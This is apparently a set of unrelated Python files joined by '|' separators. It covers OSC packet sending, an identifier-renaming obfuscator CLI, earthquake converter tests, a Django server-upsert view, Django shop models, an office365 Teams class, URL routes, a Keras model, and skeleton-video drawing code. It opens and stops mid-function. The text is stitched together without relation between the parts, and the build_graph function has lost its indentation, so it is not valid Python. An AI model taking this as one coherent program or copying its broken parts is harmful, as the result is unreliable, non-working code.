        # BUG FIX: packet_send_function takes a logger parameter that the
        # original call omitted, raising TypeError on every nodelay send.
        # No logger is available here, so pass None explicitly.
        packet_send_function(packet, packopt, targets, None)
    else:
        # Queue the packet to not consume time here.
        post_sendpacket(SendingPacket(packet, packopt, targets))
# ========================= INTERNAL SENDING FUNCTIONS ======================
def packet_send_function(packet, packopt, targets, logger=None):
    """Identify peers / channels, and manage transmission.

    Proceed packet sending operations with managing multiple destinations
    with as common operations as possible.

    :param packet: the bundle or message to send.
    :type packet: OSCMessage or OSCBundle
    :param packopt: the options for packet transmission.
    :type packopt: PacketOptions
    :param targets: targetted peers names or channel names.
    :type targets: set
    :param logger: Python logger to trace activity.
        Default to None (the docstring always promised this default; the
        signature now actually provides it, so 3-argument callers work).
    :type logger: logging.Logger
    """
    if logger is not None:
        logger.debug("OSC packet_send_function to targets %r with %s",
                     targets, packet)
    if "_local" in targets:
        targets.remove("_local")
        # Directly call dispatching function, not going through OSC packet
        # sending via network & co.
        oscdispatching.globdisp().dispatch_packet(packet, packopt)
        if not targets:     # There was only local delivery
            return
    # Selection of channel names with special names.
    if "_all" in targets:
        targets.remove("_all")
        for name in oscchannel.all_channels:
            # We only select channels which are writers.
            chan = oscchannel.get_channel(name)
            if chan.is_writer:
                targets.add(name)
    # Names of channels who will receive the packet with standard processing.
    stdchannels = set()
    for cname in targets:
        chan = oscchannel.get_channel(cname)
        if chan is None:
            if logger is not None:
                logger.error("OSC packet_send_function have unknown "\
                             "targets channel %r", cname)
            continue
        res = chan.handle_action("encodepacket", (packet, packopt))
        if res == (None, None):
            # The action handler must have completly processed the packet,
            # including transmission.
            continue
        elif res is None:
            # No interesting processing, will directly send the same encoded
            # packet to the channel like others.
            stdchannels.add(cname)
        else:
            # The action handler encode the packet from its own, and may have
            # modified packet options - directly transmit the result of its
            # processing.
            transmit_rawpacket(res[0], res[1], {cname}, logger)
    # Now, transmit to all channels accepting direct transmission (ie. with
    # no special encoding).
    if stdchannels:
        rawoscdata = oscbuildparse.encode_packet(packet)
        transmit_rawpacket(rawoscdata, packopt, stdchannels, logger)
def transmit_rawpacket(rawpacket, packopt, writersnames, logger=None):
    """Call writer channels functions to transmit raw data.

    This function transmit the *same* raw OSC packet to a set of transport
    channels.

    :param rawpacket: the binary packet to write.
    :type rawpacket: bytes or bytearray
    :param packopt: the options for packet transmission.
    :type packopt: PacketOptions
    :param writersnames: set of names of writers to send data.
    :type writersnames: { str }
    :param logger: Python logger to trace activity.
        Default to None (default now provided in the signature as the
        docstring always stated; a stale ':param workqueue:' entry that
        matched no parameter was also removed).
    :type logger: logging.Logger
    """
    if logger is not None:
        logger.debug("OSC transmit_rawpacket to channels %r", writersnames)
    for cname in writersnames:
        chanel = oscchannel.get_channel(cname)
        if chanel is None:
            if logger is not None:
                logger.error("OSC transmit_rawpacket, channel name "\
                             "%r is not referenced", cname)
            continue    # Dismiss the packet.
        if not chanel.is_writer:
            if logger is not None:
                logger.error("OSC transmit_rawpacket, channel name "\
                             "%r is not a writer", cname)
            continue    # Dismiss the packet.
        # Each channel gets its own copy of the options with its target set.
        newopt = packopt.duplicate()
        newopt.chantarget = cname
        chanel.transmit_data(rawpacket, newopt)
# ====================== EVENT LOOP PUBLIC FUNCTIONS ======================
def sendingpackets_process_loop(deadlinetime=0, logger=None):
    """Manage encoding and sending of packets.

    Called as a thread entry point, or as a simple function in an event
    loop.

    :param deadlinetime: exit from loop after this time, even if there are
        remaining packets to send. Its an *absolute* time in seconds,
        in same time base as time.time().
        A 0 value do process all packets until the queue is empty then return.
        A None value is used when in own thread.
    :type deadlinetime: float or None
    :param logger: Python logger to trace activity.
        Default to None
    :type logger: logging.Logger
    """
    try:
        if deadlinetime is None and logger is not None:
            logger.info("OSC Starting sendingpackets_process_loop()")
        while True:
            timeout = oscscheduling.deadline2timeout(deadlinetime)
            nextsend = next_sendpacket(timeout)
            # If no packet while in own thread, continue with waiting.
            if nextsend is None and deadlinetime is None:
                continue
            # If no packet while in event loop, return.
            if nextsend is None and deadlinetime == 0:
                return
            # Proper termination via a special tuple (compared on identity).
            if nextsend is LAST_SENDINGPACKET:
                if sendpackets_terminate:
                    break   # Properly exit from function (from thread...)
                else:
                    nextsend = None
            if nextsend is not None:
                if logger is not None:
                    logger.debug("OSC send packets processing %r", nextsend)
                packet, packopt, targets = nextsend
                packet_send_function(packet, packopt, targets, logger)
            # If the deadline has elapsed, stop processing.
            if deadlinetime and time.time() > deadlinetime:
                break
        if deadlinetime is None and logger is not None:
            logger.info("OSC Finishing sendingpackets_process_loop()")
    # Bare except is deliberate here: this can be a thread entry point and
    # must log any failure rather than die silently — presumably including
    # SystemExit; confirm before narrowing to Exception.
    except:
        if logger is not None:
            logger.exception("OSC Failure in sendingpackets_process_loop()")
def rawpackets_process_loop(deadlinetime=0, logger=None):
    """Called by readers when some raw data come from the system.
    Process all queued packets until the queue is empty or the deadlinetime
    is reached.
    :param deadlinetime: exit from loop after this time, even if there are
        remaining packets to process. Its an *absolute* time in seconds,
        in same time base as time.time().
        A 0 value do process all messages until the queue is empty then return.
        A None value is used when in own thread.
    :type deadlinetime: float or None
    :param logger: Python logger to trace activity.
        Default to None
    :type logger: logging.Logger
    """
    try:
        if deadlinetime is None and logger is not None:
            logger.info("OSC Starting rawpackets_process_loop()")
        while True:
            timeout = oscscheduling.deadline2timeout(deadlinetime)
            nextpacket = oscchannel.next_rawpacket(timeout)
            # If no packet while in event loop, return.
            if nextpacket is None and deadlinetime == 0:
                return
            # If no packet while in own thread, continue with waiting.
            if nextpacket is None and deadlinetime is None:
                continue
            # Proper termination via a special tuple.
            if nextpacket == oscchannel.LAST_RAWPACKET:
                if rawpackets_terminate:
                    break   # Properly exit from function (from thread...)
                else:
                    nextpacket = None
            if nextpacket is not None:
                if logger is not None:
                    logger.debug("OSC raw packet processing %r", nextpacket)
                # Identify peer manager for decoding.
                rawoscdata, packopt = nextpacket
                readername = packopt.readername
                chan = oscchannel.get_channel(readername)
                if chan is None:
                    # This should never occur (!)
                    if logger is not None:
                        logger.error("OSC raw packet from unknown %r channel",
                                     readername)
                    continue
                res = chan.handle_action("decodepacket", (rawoscdata, packopt))
                if res == (None, None):
                    # The action handler must have completly processed the
                    # packet, including dispatching.
                    packet = packopt = None
                elif res is None:
                    # No interesting processing, we decode the packet
                    # ourself and it will be dispatched.
                    packet = oscbuildparse.decode_packet(rawoscdata)
                else:
                    # The action handler decode the packet from its own, and
                    # may have modified packet options - directly use
                    # the result of this processing.
                    packet, packopt = res
                if packet is not None:
                    oscdispatching.globdisp().dispatch_packet(packet, packopt)
            # If has deadline elapsed, continue with waiting.
            if deadlinetime and time.time() > deadlinetime:
                break
        if deadlinetime is None and logger is not None:
            logger.info("OSC Finishing rawpackets_process_loop()")
    # BUG FIX: was a bare `except:` which also swallowed SystemExit and
    # KeyboardInterrupt; only unexpected errors should be logged here.
    except Exception:
        if logger is not None:
            logger.exception("OSC Failure in rawpackets_process_loop()")
# ================== BACKGROUND THREADS PUBLIC FUNCTIONS ===================
def create_rawpackets_thread(logger=None):
    """Spawn the background thread that consumes queued raw packets.

    No-op if the thread is already running.

    :param logger: Python logger to trace activity.
        Default to None
    :type logger: logging.Logger
    """
    global rawpackets_terminate, rawpackets_thread
    if rawpackets_thread is not None:
        return
    rawpackets_terminate = False
    worker = threading.Thread(
        target=rawpackets_process_loop,
        args=(None, logger),    # deadlinetime None: blocking wait, not polling.
        name="RawPackThread")
    worker.daemon = False
    rawpackets_thread = worker
    worker.start()
def terminate_rawpackets_thread():
    """Stop the raw-packets thread and wait for its effective termination.

    Posts the LAST_RAWPACKET sentinel so the blocked consumer wakes up.
    Note: remaining packets in the received queue are ignored.
    """
    global rawpackets_terminate, rawpackets_thread
    rawpackets_terminate = True
    oscchannel.post_rawpacket(oscchannel.LAST_RAWPACKET)
    worker = rawpackets_thread
    worker.join()
    rawpackets_thread = None
def create_sendingpackets_thread(logger=None):
    """Spawn the background thread that encodes and sends queued packets.

    No-op if the thread is already running.

    :param logger: Python logger to trace activity.
        Default to None
    :type logger: logging.Logger
    """
    global sendpackets_thread, sendpackets_terminate
    if sendpackets_thread is not None:
        return
    sendpackets_terminate = False
    worker = threading.Thread(
        target=sendingpackets_process_loop,
        args=(None, logger),    # deadlinetime None: blocking wait, not polling.
        name="SendPackThread")
    worker.daemon = False
    sendpackets_thread = worker
    worker.start()
def terminate_sendingpackets_thread():
    """Stop the sending-packets thread and wait for its effective termination.

    Posts the LAST_SENDINGPACKET sentinel so the blocked consumer wakes up.
    Note: remaining packets in the queue are ignored.
    """
    global sendpackets_thread, sendpackets_terminate
    sendpackets_terminate = True
    post_sendpacket(LAST_SENDINGPACKET)
    worker = sendpackets_thread
    worker.join()
    sendpackets_thread = None
|
import argparse
from obfuscator_source.file_handler import ObfuscationFileHandler
def main():
    """Parse command-line arguments and run the obfuscator on a file or directory."""
    parser = argparse.ArgumentParser(
        description='A python obfuscator that will obfuscate names using the ast library.')
    parser.add_argument('--obfuscated_folder_path', required=True,
                        help='Folder to save obfuscated code in')
    parser.add_argument('--directory',
                        help='Directory containing python files to obfuscate(Can only target either directory or file but not both)')
    parser.add_argument('--file',
                        help='File to obfuscate(Can only target either directory or file but not both)')
    args = parser.parse_args()
    assert_valid_arguments(args)
    handler = ObfuscationFileHandler(args.obfuscated_folder_path)
    if args.directory:
        handler.run_obfuscator_directory(args.directory)
    else:
        handler.run_obfuscator_file(args.file)
def assert_valid_arguments(args):
    """Validate that exactly one of --directory / --file was given.

    :param args: parsed argparse namespace with `directory` and `file` attrs.
    :raises SystemExit: with a usage message when neither or both are set.
        (BUG FIX: `assert` was used for CLI validation, which is silently
        stripped when Python runs with -O; raise explicitly instead.)
    """
    if not (args.directory or args.file):
        raise SystemExit("No File or Directory provided.")
    if args.directory and args.file:
        raise SystemExit("Can only target either directory or file but not both")
# Run only when executed as a script; exit() forwards main()'s return value
# (None here) to the interpreter, i.e. exit status 0.
if __name__ == '__main__':
    exit(main())
|
import unittest
from unittest import mock
from earthquake.eq_item import EarthquakeItem
from earthquake.steps_converter import StepperStepsConverter, StepItem, ScalingDelegateStepsConverter, StepsConverter, \
DelegateDeltaStepsConverter
class TestStepperStepsConverter(unittest.TestCase):
    """StepperStepsConverter must emit the expected quadratic step values."""

    def test(self):
        quakes = [EarthquakeItem(9.8, t) for t in (10, 20, 30)]
        converter = StepperStepsConverter(2)
        seen = 0
        for idx, step in enumerate(converter.convert_to_steps(quakes)):
            expected = 0.5 * 9.8 * (idx * 2 + 2) ** 2
            self.assertAlmostEqual(expected, step.value, delta=0.00001,
                                   msg='Error in {}'.format(idx))
            seen += 1
        self.assertEqual(15, seen)
class TestScalingDelegateStepsConverter(unittest.TestCase):
    """ScalingDelegateStepsConverter must scale every delegated step value."""

    def test(self):
        steps = [StepItem(v) for v in range(10)]
        delegate = mock.create_autospec(StepsConverter)
        delegate.convert_to_steps.return_value = steps
        converter = ScalingDelegateStepsConverter(delegate, 123.0)
        seen = 0
        for idx, step in enumerate(converter.convert_to_steps(mock.ANY)):
            self.assertEqual(123.0 * idx, step.value)
            seen += 1
        self.assertEqual(len(steps), seen)
class TestDelegateDeltaStepsConverter(unittest.TestCase):
    """DelegateDeltaStepsConverter must yield consecutive differences (one fewer item)."""

    def test(self):
        steps = [StepItem(v) for v in range(10)]
        delegate = mock.create_autospec(StepsConverter)
        delegate.convert_to_steps.return_value = steps
        converter = DelegateDeltaStepsConverter(delegate)
        seen = 0
        for step in converter.convert_to_steps(mock.ANY):
            self.assertEqual(1, step.value)
            seen += 1
        self.assertEqual(len(steps) - 1, seen)
|
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from resources.models import Server
import datetime
@csrf_exempt
def ServerInfoAuto(request):
    """Upsert a Server record from agent-POSTed data.

    POST: looks up the server by its 'uuid' field; if found, refreshes its
    check_update_time; otherwise creates a new Server from all POSTed fields.
    Always returns an empty 200 response (non-POST requests do nothing).
    """
    if request.method == "POST":
        data = request.POST.dict()
        # NOTE(review): naive local time; consider django.utils.timezone.now()
        # if USE_TZ is enabled -- confirm project settings.
        data['check_update_time'] = datetime.datetime.now()
        try:
            s = Server.objects.get(uuid__exact=data['uuid'])
            # BUG FIX: the fetched instance was saved without ever applying
            # the new timestamp, so the partial save persisted the old value.
            s.check_update_time = data['check_update_time']
            s.save(update_fields=["check_update_time"])
        except Server.DoesNotExist:
            s = Server(**data)
            s.save()
    return HttpResponse("")
|
# -*- coding:utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Category(models.Model):
    """Product category with a URL slug and an activation flag."""

    name = models.CharField(max_length=255, verbose_name=u'Kategori İsmi')
    slug = models.SlugField(max_length=255, verbose_name=u'Kategori Slug')
    description = models.TextField(verbose_name=u'Açıklama', null=True, blank=True)
    active = models.BooleanField(verbose_name=u'Aktif', default=True)

    def __unicode__(self):
        return self.name

    class Meta:
        verbose_name = _(u'Kategori')
        verbose_name_plural = _(u'Kategoriler')
class Product(models.Model):
    """Sellable product: category link, pricing (net/VAT/total) and ordering."""

    name = models.CharField(max_length=255, verbose_name=u'Ürün İsmi')
    slug = models.SlugField(
        max_length=255, verbose_name=u'Ürün Slug',
        help_text=u'Ürün ismini yazarken otomatik olarak bu alan doldurulucaktır.')
    category = models.ForeignKey(Category, null=True, blank=True, verbose_name=u'Kategori')
    description = models.TextField(verbose_name=u'Açıklama', null=True, blank=True)
    price = models.DecimalField(
        decimal_places=2, max_digits=10, verbose_name=u'Ürün Fiyatı',
        help_text=u'Ürünün fiyatını giriniz.')
    kdv = models.DecimalField(
        decimal_places=2, max_digits=10, verbose_name=u'KDV Fiyatı',
        help_text=u'Ürünün kdv tutarını giriniz.')
    total_price = models.DecimalField(decimal_places=2, max_digits=10, verbose_name=u'Toplam Fiyatı')
    order = models.IntegerField(default=0, verbose_name=u'Ürün Sıralması')
    active = models.BooleanField(verbose_name=u'Aktif', default=True)

    def __unicode__(self):
        return self.name

    class Meta:
        verbose_name = _(u'Ürün')
        verbose_name_plural = _(u'Ürünler')
|
from office365.entity import Entity
from office365.runtime.queries.service_operation_query import ServiceOperationQuery
from office365.runtime.queries.update_entity_query import UpdateEntityQuery
from office365.runtime.resource_path import ResourcePath
from office365.teams.channel import Channel
from office365.teams.channelCollection import ChannelCollection
from office365.teams.schedule import Schedule
from office365.teams.teamFunSettings import TeamFunSettings
from office365.teams.teamGuestSettings import TeamGuestSettings
from office365.teams.teamMemberSettings import TeamMemberSettings
from office365.teams.teamMessagingSettings import TeamMessagingSettings
from office365.teams.teamsAppInstallationCollection import TeamsAppInstallationCollection
from office365.teams.teamsAsyncOperationCollection import TeamsAsyncOperationCollection
class Team(Entity):
    """A team in Microsoft Teams is a collection of channel objects. A channel represents a topic, and therefore a
    logical isolation of discussion, within a team. """

    def __init__(self, context, resource_path=None, properties=None):
        super().__init__(context, resource_path, properties)
        # Default (empty) settings holders; replaced once properties load.
        self.memberSettings = TeamMemberSettings()
        self.guestSettings = TeamGuestSettings()
        self.messagingSettings = TeamMessagingSettings()
        self.funSettings = TeamFunSettings()

    @property
    def channels(self):
        """The collection of channels & messages associated with the team."""
        return self.properties.get('channels',
                                   ChannelCollection(self.context, ResourcePath("channels", self.resource_path)))

    @property
    def primaryChannel(self):
        """The general channel for the team."""
        return self.properties.get('primaryChannel',
                                   Channel(self.context, ResourcePath("primaryChannel", self.resource_path)))

    @property
    def schedule(self):
        """The schedule of shifts for this team."""
        return self.properties.get('schedule',
                                   Schedule(self.context, ResourcePath("schedule", self.resource_path)))

    @property
    def installedApps(self):
        """The apps installed in this team."""
        return self.properties.get('installedApps',
                                   TeamsAppInstallationCollection(self.context,
                                                                  ResourcePath("installedApps", self.resource_path)))

    @property
    def operations(self):
        """The async operations that ran or are running on this team."""
        # BUG FIX: the path segment was "installedApps" (copy-paste from the
        # installedApps property above); async operations live under the
        # "operations" navigation segment.
        return self.properties.get('operations',
                                   TeamsAsyncOperationCollection(self.context,
                                                                 ResourcePath("operations", self.resource_path)))

    def update(self):
        """Updates a Team."""
        qry = UpdateEntityQuery(self)
        self.context.add_query(qry)
        return self

    def archive(self):
        """Archive the specified team. When a team is archived, users can no longer send or like messages on any
        channel in the team, edit the team's name, description, or other settings, or in general make most changes to
        the team. Membership changes to the team continue to be allowed. """
        qry = ServiceOperationQuery(self, "archive")
        self.context.add_query(qry)
        return self

    def unarchive(self):
        """Restore an archived team. This restores users' ability to send messages and edit the team, abiding by
        tenant and team settings. """
        qry = ServiceOperationQuery(self, "unarchive")
        self.context.add_query(qry)
        return self

    def clone(self):
        """Create a copy of a team. This operation also creates a copy of the corresponding group. """
        qry = ServiceOperationQuery(self, "clone")
        self.context.add_query(qry)
        return self

    def set_property(self, name, value, persist_changes=True):
        super(Team, self).set_property(name, value, persist_changes)
        # fallback: fix resource path once the server-assigned id is known
        if name == "id" and self._resource_path.segment == "team":
            self._resource_path = ResourcePath(value, ResourcePath("teams"))
        return self
|
from django.urls import path
from pet_shelter.views import Index, Athome, Pet, About
# URL namespace used for reversing, e.g. reverse('pet_shelter:index').
app_name = 'pet_shelter'
# Route table mapping paths to the class-based views imported above.
urlpatterns = [
    path('', Index.as_view(), name='index'),
    path('athome/', Athome.as_view(), name='athome'),
    path('detail/<int:pk>/', Pet.as_view(), name='pet-detail'),  # pk = Pet primary key
    path('about/', About.as_view(), name='about'),
]
|
import os
import config
from scipy.interpolate import interp2d
import tensorflow as tf
import numpy as np
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import metrics
from tensorflow.python.keras.models import Model, Sequential
from tensorflow.python.keras.layers import Activation, Concatenate, Dropout, AlphaDropout, Reshape, Layer, Lambda, BatchNormalization, Input, Flatten, Conv2D, Conv2DTranspose, LocallyConnected2D, Dense, MaxPooling2D, AveragePooling2D, UpSampling2D, LeakyReLU
from tensorflow.python.keras.regularizers import l2
from tensorflow.python.keras.optimizers import Adam, Nadam
from tensorflow.python.keras.losses import binary_crossentropy
from lib.models.util.make_parallel import make_parallel
class Framer(object):
    """Three-layer convolutional feature extractor over page images.

    References:
    https://keras.io/getting-started/functional-api-guide/#multi-input-and-multi-output-models
    https://keras.io/getting-started/functional-api-guide/#shared-layers
    https://blog.keras.io/building-autoencoders-in-keras.html
    https://github.com/fchollet/keras/blob/master/examples/variational_autoencoder_deconv.py
    """

    def __init__(self, input_shape=(778, 576, 1), num_categories=5, parallel_mode=False, verbose=False):
        """Build and compile the convolutional network.

        :param input_shape: (rows, cols, channels) of the input images.
        :param num_categories: stored on the instance; not used by the layers here.
        :param parallel_mode: accepted for interface compatibility; unused here.
        :param verbose: when True, print the network input shape.
        """
        self.num_categories = num_categories
        filters = 128
        img_rows, img_cols, img_chns = input_shape
        input_img = Input(shape=input_shape, name="main_input")
        if verbose:
            print("Network input shape is", input_img.get_shape())
        x = Conv2D(filters, (3, 3), padding='same', activity_regularizer=l2(10e-8))(input_img)
        x = BatchNormalization()(x)
        x = LeakyReLU(alpha=0.05)(x)
        x = Conv2D(filters, (3, 3), padding='same', activity_regularizer=l2(10e-8))(x)
        x = BatchNormalization()(x)
        x = LeakyReLU(alpha=0.05)(x)
        x = Conv2D(filters, (3, 3), padding='same', activity_regularizer=l2(10e-8))(x)
        x = BatchNormalization()(x)
        x = LeakyReLU(alpha=0.05)(x)
        self.framer = Model(input_img, x)
        optimizer = Nadam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=1e-08, schedule_decay=0.004, clipnorm=0.618)
        self.framer.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['acc'])

    def save(self, path):
        """Save model weights beside this source file; returns self for chaining."""
        loc = os.path.join(self.path(), path)
        print("Saving weights to", loc)
        # BUG FIX: self.classycoder is never defined on this class (copy-paste
        # from a sibling model); the compiled model is held in self.framer.
        self.framer.save_weights(loc)
        return self

    def load(self, path="Classifier.h5"):
        """Load model weights from beside this source file; returns self for chaining."""
        loc = os.path.join(self.path(), path)
        print("Loading weights", loc)
        # BUG FIX: as in save(), use the attribute that actually exists.
        self.framer.load_weights(loc)
        return self

    def path(self):
        """Directory containing this source file."""
        return os.path.dirname(os.path.realpath(__file__))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import torch
import math
import cv2
import numpy as np
import time
import gizeh as gz
import json
from more_itertools.recipes import grouper, pairwise
import moviepy.editor as mpy
import pandas as pd
# Font used for any on-frame text rendering.
DEFAULT_FONT = cv2.FONT_HERSHEY_SIMPLEX
# Default options for cv2.VideoWriter when saving rendered clips.
DEFAULT_VIDEO_SAVE_OPT = {
    'savepath': 'examples/res/1.mp4',
    'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
    'fps': 25,
    'frameSize': (640, 480)
}
# Limb connectivity for the 17-joint (COCO-style) skeleton; index 17 is a
# synthetic neck joint computed from the shoulders by the drawing code below.
l_pair_17 = [
    (0, 1), (0, 2), (1, 3), (2, 4),  # Head
    (5, 6), (5, 7), (7, 9), (6, 8), (8, 10),
    (17, 11), (17, 12),  # Body
    (11, 13), (12, 14), (13, 15), (14, 16),(17,0)
]
# Per-limb RGB colors (0-1 floats) for the 17-joint skeleton.
colors17 = np.array([
    [255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0],
    [85, 255, 0], [0, 255, 0], [0, 255, 85],
    [0, 255, 170], [255,200,100],
    [0, 170, 255], [255,130,100], [0, 0, 255], [255,150,80], [0, 50, 255],
    [255,0,0]])/255
# Per-joint colors for the 17-joint skeleton.
p_color_17 = np.array([(0, 255, 255), (0, 191, 255), (0, 255, 102), (0, 77, 255), (0, 255, 0),  # Nose, LEye, REye, LEar, REar
                    (77, 255, 255), (77, 255, 204), (77, 204, 255), (191, 255, 77), (77, 191, 255), (191, 255, 77),  # LShoulder, RShoulder, LElbow, RElbow, LWrist, RWrist
                    (204, 77, 255), (77, 255, 204), (191, 77, 255), (77, 255, 191), (127, 77, 255), (77, 255, 127), (0, 255, 255)])/255  # LHip, RHip, LKnee, Rknee, LAnkle, RAnkle, Neck
#p_color_17 = np.array([(255, 0, 85), (255, 0, 0), (255, 85, 0), (255, 170, 0), (255, 255, 0), (170, 255, 0), (85, 255, 0), (0, 255, 0), (0, 255, 85), (0, 255, 170), (0, 255, 255), (0, 170, 255), (0, 85, 255), (0, 0, 255), (255, 0, 170), (170, 0, 255), (255, 0, 255), (85, 0, 255)])/255
# Per-limb line colors for the 17-joint skeleton.
line_color_17 = np.array([(0, 215, 255), (0, 255, 204), (0, 134, 255), (0, 255, 50),
                (77, 255, 222), (191, 255, 77), (77, 255, 77), (77, 196, 255), (77, 135, 255),
                (255, 80, 120), (77, 222, 255),
                (255, 0,80), (0, 80, 255), (255, 0,0), (0, 0, 255),(77, 255, 222)])/255
# Limb connectivity for the 26-joint (Halpe) skeleton, including foot joints.
l_pair_26 = [
    (0, 1), (0, 2), (1, 3), (2, 4),  # Head
    (5, 18), (6, 18), (5, 7), (7, 9), (6, 8), (8, 10),# Body
    (17, 18), (18, 19), (19, 11), (19, 12),
    (11, 13), (12, 14), (13, 15), (14, 16),
    (20, 15), (21, 16), (23, 16), (22, 15), (15, 24), (16, 25),# Foot
]
# Per-joint colors for the 26-joint skeleton.
p_color_26 = np.array([(0, 255, 255), (0, 191, 255), (0, 255, 102), (0, 77, 255), (0, 255, 0),  # Nose, LEye, REye, LEar, REar
                    (77, 255, 255), (77, 255, 204), (77, 204, 255), (191, 255, 77), (77, 191, 255), (191, 255, 77),  # LShoulder, RShoulder, LElbow, RElbow, LWrist, RWrist
                    (204, 77, 255), (77, 255, 204), (191, 77, 255), (77, 255, 191), (127, 77, 255), (77, 255, 127),  # LHip, RHip, LKnee, Rknee, LAnkle, RAnkle, Neck
                    (77, 255, 255), (0, 255, 255), (77, 204, 255),  # head, neck, shoulder
                    (0, 255, 255), (0, 191, 255), (0, 255, 102), (0, 77, 255), (0, 255, 0), (77, 255, 255)])/255  # foot)
# Per-limb line colors for the 26-joint skeleton.
line_color_26 = np.array([(0, 215, 255), (0, 255, 204), (0, 134, 255), (0, 255, 50),
                    (0, 255, 102), (77, 255, 222), (77, 196, 255), (77, 135, 255), (191, 255, 77), (77, 255, 77),
                    (77, 191, 255), (204, 77, 255), (77, 222, 255), (255, 156, 127),
                    (0, 127, 255), (255, 127, 77), (0, 77, 255), (255, 77, 36),
                    (0, 77, 255), (0, 77, 255), (0, 77, 255), (0, 77, 255), (255, 156, 127), (255, 156, 127)])/255
# Limb connectivity for the 18-joint OpenPose BODY_18 skeleton.
l_pair_openpose = [
    [1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], [9, 10],
    [1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], [0, 15], [15, 17],
]
# Limb connectivity for the 25-joint OpenPose BODY_25 skeleton (with feet).
l_pair_openpose25 = [
    [1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8],
    [8, 9], [9, 10], [10,11], [11,24], [11,22], [22,23],
    [8,12], [12, 13], [13,14], [14,21], [14,19], [19,20],
    [1, 0],
    [0, 16], [18, 16],
    [0, 15], [15, 17],
]
# Per-limb colors for the BODY_25 skeleton (0-1 floats).
colors_openpose25 = np.array([
    [255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0],
    [85, 255, 0], [255,0,0],
    [0, 255, 0], [0, 255, 85], [0, 255, 85], [0, 255, 85], [0, 255, 85], [0, 255, 85],
    [0, 255, 170], [0, 255, 255],[0, 170, 255],[0, 170, 255],[0, 170, 255],[0, 170, 255],
    [0, 85, 255],
    # [0, 0, 255], [85, 0, 255],
    # [170, 0, 255],
    [255, 0, 255], [255, 0, 170],
    [255, 0, 85], [255, 0, 0]])/255
#for plot usage
# Per-limb colors for the BODY_18 skeleton (0-1 floats).
colors_openpose = np.array([
    [255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0],
    [85, 255, 0], [0, 255, 0], [0, 255, 85], [0, 255, 170], [0, 255, 255],
    [0, 170, 255], [0, 85, 255], [0, 0, 255], [85, 0, 255], [170, 0, 255],
    [255, 0, 255], [255, 0, 170], [255, 0, 85], [255, 0, 0]])/255
def build_graph(lines):
graph = {}
for line in lines:
for n1, n2 in pairwise(line):
if n1 > n2:
n1, n2 = n2, n1
graph.setdefault(n1, set()).add(n2)
return graph
#BODY_25_GRAPH = build_graph(BODY_25_LINES)
def max_dim(doc, dim):
    """Return the largest coordinate at offset *dim* across all people.

    Keypoint arrays are flat (x, y, score, x, y, score, ...) triples, so
    slicing with step 3 from *dim* picks one coordinate component.

    :param doc: parsed OpenPose JSON document with a "people" list.
    :param dim: 0 for x, 1 for y, 2 for confidence scores.
    :return: maximum value found (raises ValueError if there are none).
    """
    candidates = (
        value
        for person in doc["people"]
        for coords in person.values()
        for value in coords[dim::3]
    )
    return max(candidates)
#to visualize the final ready dataset and the generated dance
def make_video_openpose(data, save_video=True, output_filename="../test.mp4",fps=10):
    """Render a sequence of 18-joint OpenPose poses as a skeleton video.

    :param data: ndarray of per-frame joint coordinates, or a list of dicts
        each holding a flat 'keypoints' list (grouped per joint below).
        NOTE(review): the drawing code unpacks exactly (x, y) per joint --
        confirm inputs carry 2 values per joint, not (x, y, score).
    :param save_video: when True, write the frames with moviepy.
    :param output_filename: output video path (mpeg4 codec).
    :param fps: frames per second of the output clip.
    """
    width = 640
    height = 360
    joints = 18
    print("make! fps:",fps, len(data))
    # ndarray input is already per-joint; dict input needs regrouping.
    arr = True if isinstance(data, np.ndarray) else False
    result = []
    for frame in data:
#        print(cur_idx, frame['image_id'])
        surface = gz.Surface(width=width, height=height, bg_color=(1,1,1))
        if arr:
            pose = frame.tolist()
        else:
            n_group = int(len(frame['keypoints']) / joints)
            pose = list(grouper(frame["keypoints"], n_group))
        line_cnt = 0
        l_pair = l_pair_openpose
        line_color = colors_openpose
        # Draw limbs first, then joints on top.
        for limb in l_pair:
            x1, y1 = pose[limb[0]]
            x2, y2 = pose[limb[1]]
            line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 6, stroke=line_color[line_cnt])
#            print('line', line_cnt)
            line_cnt += 1
            line.draw(surface)
        for idx in range(len(pose)):
#            print(idx)
            x1, y1 = pose[idx]
            joint = gz.circle(4, xy=[x1,y1], fill=(0,0,0))
            joint.draw(surface)
        result.append(surface.get_npimage())
    if save_video:
        clip = mpy.ImageSequenceClip(result, fps=fps)
        clip.write_videofile(output_filename, fps=fps, codec='mpeg4')
def visualize_frame(frame, joints=17, label=0):
    """Draw a single pose frame and save it via show_img().

    :param frame: for joints==25, an OpenPose JSON doc ('people'[0] is used,
        keys 'pose_keypoints_2d'); otherwise a dict with a flat 'keypoints'
        list. Each joint group must unpack as (x, y, score).
    :param joints: skeleton layout: 17, 25 or 26.
        NOTE(review): any other value leaves l_pair unbound -> UnboundLocalError.
    :param label: frame index used as the saved image's filename.
    """
    surface = gz.Surface(width=640, height=360, bg_color=(1,1,1))
    if joints == 25:
        frame = frame['people'][0]
        n_group = int(len(frame['pose_keypoints_2d']) / joints)
        pose = list(grouper(frame["pose_keypoints_2d"], n_group))
    else:
        n_group = int(len(frame['keypoints']) / joints)
        pose = list(grouper(frame["keypoints"], n_group))
#    print(pose)
    # Pick the limb table and color palette for the skeleton layout.
    if joints==17:
        l_pair = l_pair_17
        line_color = colors17
    elif joints==25:
        l_pair = l_pair_openpose25
        line_color = colors_openpose25
    elif joints == 26:
        l_pair = l_pair_26
        line_color = line_color_26
    line_cnt = 0
    for limb in l_pair:
#        print(limb)
        # Index == joints refers to the synthetic neck: shoulder midpoint.
        if limb[0] == joints and (joints == 17 or joints == 26):
